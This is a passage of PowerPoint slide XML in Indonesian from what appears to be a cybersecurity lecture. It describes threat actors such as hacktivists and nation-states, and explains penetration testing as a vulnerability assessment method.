            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keprihatinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>etis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kampanye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yakini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertentangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keyakinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>etis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>filosofis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksfiltrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di negara lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Negara-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spionase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berperang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spionase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksfiltrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempelajari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjualnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerasan</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46585308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Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lainnya</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penetrasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agresif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>etis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berusaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menembus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkadang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diungkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecerdikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kreativitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
